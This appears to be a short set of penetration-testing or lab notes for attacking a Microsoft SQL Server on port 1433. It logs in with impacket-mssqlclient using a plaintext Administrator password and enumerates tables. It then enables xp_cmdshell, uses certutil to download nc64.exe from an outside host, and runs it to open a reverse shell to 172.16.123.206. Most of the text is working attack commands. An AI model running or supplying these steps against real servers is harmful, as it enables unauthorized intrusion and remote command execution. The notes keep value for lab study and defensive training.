Port 1433 (MSSQL, default TCP port)

impacket-mssqlclient Administrator:Lab123@$ip -windows-auth

enum_db



-- Lists the tables of the database currently in use (sys.tables is per-database).
-- Catalog views return only the objects the connected login is permitted to see.
-- Rows in sys.tables already have type 'U', so the filter is redundant but harmless.
SELECT t.name AS TableName FROM sys.tables AS t WHERE t.type = 'U';


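Note: enable_xp_cmdshell needs sysadmin rights and changes a server-wide setting; the change is written to the SQL Server error log, and commands then run as the SQL Server service account. Restore the setting with disable_xp_cmdshell when finished.
enable_xp_cmdshell
xp_cmdshell whoami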

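Note: this step writes nc64.exe to C:\Users\Public and runs certutil under cmd.exe as a child of the SQL Server process, a lineage that endpoint monitoring commonly alerts on; record the path so the file is removed at cleanup.
xp_cmdshell "certutil -urlcache -split -f http://172.16.123.206/nc64.exe C:\Users\Public\nc64.exe"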

xp_cmdshell "C:\Users\Public\nc64.exe 172.16.123.206 80 -e cmd"